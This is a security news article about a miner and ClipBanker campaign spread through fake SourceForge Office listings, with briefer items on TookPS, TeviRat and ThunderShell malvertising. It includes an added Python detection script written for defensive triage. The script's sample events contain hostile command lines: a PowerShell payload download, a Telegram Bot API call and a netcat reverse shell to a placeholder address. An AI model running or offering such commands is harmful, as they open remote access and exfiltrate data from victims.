Cryptocurrency Miner and Clipper Malware Spread via SourceForge Cracked Software Listings

News Room, published 8 April 2025 (last updated 2025/04/08 at 2:09 PM)

Threat actors have been observed distributing malicious payloads, including a cryptocurrency miner and clipper malware, via SourceForge, a popular software hosting service, under the guise of cracked versions of legitimate applications such as Microsoft Office.

“One such project, officepackage, on the main website sourceforge.net, appears harmless enough, containing Microsoft Office add-ins copied from a legitimate GitHub project,” Kaspersky said in a report published today. “The description and contents of officepackage provided below were also taken from GitHub.”

While every project created on sourceforge.net is assigned a “<project>.sourceforge.io” domain name, the Russian cybersecurity company found that the domain for officepackage, “officepackage.sourceforge[.]io,” displays, in Russian, a long list of Microsoft Office applications with corresponding download links.

On top of that, hovering over the download button reveals a seemingly legitimate URL in the browser status bar, “loading.sourceforge[.]io/download,” giving the impression that the download is associated with SourceForge. However, clicking the link redirects the user to a completely different page hosted on “taplink[.]cc” that prominently displays another Download button.

Should victims click that download button, they are served a 7 MB ZIP archive (“vinstaller.zip”), which contains a second, password-protected archive (“installer.zip”) together with a text file holding the password needed to open it.

The second ZIP file contains an MSI installer that drops several files: a console archive utility called “UnRAR.exe,” a RAR archive, and a Visual Basic (VB) script.

“The VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub,” Kaspersky said. “This file contains the password for the RAR archive. It also unpacks malicious files and runs the next-stage script.”

The batch file also runs two PowerShell scripts. One sends system metadata to the attackers using the Telegram API; the other downloads a further batch script that acts on the contents of the RAR archive, ultimately launching the miner and the clipper malware (aka ClipBanker) payloads.

Also dropped is the netcat executable (“ShellExperienceHost.exe”) that establishes an encrypted connection with a remote server. That’s not all. The confvk batch file has been found to create another file named “ErrorHandler.cmd” that contains a PowerShell script programmed to retrieve and execute a text string through the Telegram API.
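To turn the chain described above into something a defender can check, here is an added example (not from Kaspersky's report or the original article) that applies three process-creation rules to constructed Sysmon-style events: a script host spawning a downloading PowerShell, the Telegram Bot API appearing in a command line, and ShellExperienceHost.exe running outside the Windows directory. The GitHub repository path, bot token, user paths and the 203.0.113.5 address are placeholders.

```python
import re

# Constructed Sysmon-style process-creation events, NOT real telemetry:
# (parent image, child image, command line). Repo path, bot token,
# user paths and the 203.0.113.5 address are placeholders.
SAMPLE_EVENTS = [
    ("msiexec.exe", "wscript.exe", r"wscript.exe C:\Users\u\AppData\Local\Temp\inst.vbs"),
    ("wscript.exe", "powershell.exe",
     "powershell -w hidden -c iwr https://raw.githubusercontent.com/EXAMPLE/REPO/main/confvk -OutFile confvk.bat"),
    ("cmd.exe", "powershell.exe",
     "powershell -c Invoke-RestMethod https://api.telegram.org/botTOKEN_PLACEHOLDER/sendMessage"),
    ("cmd.exe", "ShellExperienceHost.exe",
     r"C:\Users\u\AppData\Roaming\ShellExperienceHost.exe 203.0.113.5 443 -e cmd.exe"),
    ("explorer.exe", "powershell.exe", "powershell -c Get-ChildItem"),
    ("svchost.exe", "ShellExperienceHost.exe",
     r"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD_CMDLETS = re.compile(
    r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot", re.I)
WINDIR = re.compile(r"^[a-z]:\\windows\\", re.I)


def triage(events):
    """Return (event index, rule name) for every event matching a stage of the chain."""
    findings = []
    for i, (parent, child, cmdline) in enumerate(events):
        parent, child = parent.lower(), child.lower()
        # Stage 1: the VB script launches PowerShell to fetch the confvk batch file
        if parent in SCRIPT_HOSTS and child == "powershell.exe" and DOWNLOAD_CMDLETS.search(cmdline):
            findings.append((i, "script_host_powershell_download"))
        # Stage 2: system metadata sent, or commands fetched, through the Telegram Bot API
        if TELEGRAM_BOT_API.search(cmdline):
            findings.append((i, "telegram_bot_api_in_cmdline"))
        # Stage 3: netcat renamed ShellExperienceHost.exe runs outside the Windows
        # directory, where the genuine binary lives
        if child == "shellexperiencehost.exe" and not WINDIR.match(cmdline.lstrip('"')):
            findings.append((i, "masqueraded_system_binary_outside_windir"))
    return findings


if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {SAMPLE_EVENTS[idx][2]}")
```

The benign events (an interactive PowerShell from explorer.exe and the genuine ShellExperienceHost.exe under C:\Windows) produce no findings, which is the point of pairing each rule with parent process or path context rather than matching on the binary name alone.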

The fact that the website has a Russian interface indicates a focus on Russian-speaking users. Telemetry data shows that 90% of potential victims are in Russia, with 4,604 users encountering the scheme between early January and late March.

With the sourceforge[.]io pages indexed by search engines and appearing in search results, it’s believed that Russian users searching for Microsoft Office on Yandex are likely the target of the campaign.

“As users seek ways to download applications outside official sources, attackers offer their own,” Kaspersky said. “While the attack primarily targets cryptocurrency by deploying a miner and ClipBanker, the attackers could sell system access to more dangerous actors.”

The disclosure comes as the company revealed details of a campaign that’s distributing a malware downloader called TookPS via fraudulent sites impersonating the DeepSeek artificial intelligence (AI) chatbot, as well as remote desktop and 3D modeling software.

This includes websites like deepseek-ai-soft[.]com, to which unsuspecting users are redirected via sponsored Google search results, per Malwarebytes.

TookPS is engineered to download and execute PowerShell scripts that grant remote access to the infected host via SSH, and drop a modified version of a trojan dubbed TeviRat. This highlights the threat actor’s attempts to gain complete access to the victim’s computer in a variety of ways.

“The sample […] uses DLL sideloading to modify and deploy the TeamViewer remote access software onto infected devices,” Kaspersky said. “In simple terms, the attackers place a malicious library in the same folder as TeamViewer, which alters the software’s default behavior and settings, hiding it from the user and providing the attackers with covert remote access.”

The development also follows the discovery of malicious Google ads for RVTools, a popular VMware utility, to deliver a tampered version that’s laced with ThunderShell (aka SMOKEDHAM), a PowerShell-based remote access tool (RAT), underscoring how malvertising remains a persistent and evolving threat.

“ThunderShell, sometimes called SmokedHam, is a publicly available post-exploitation framework designed for red teaming and penetration testing,” Field Effect said. “It provides a command-and-control (C2) environment that allows operators to execute commands on compromised machines through a PowerShell-based agent.”
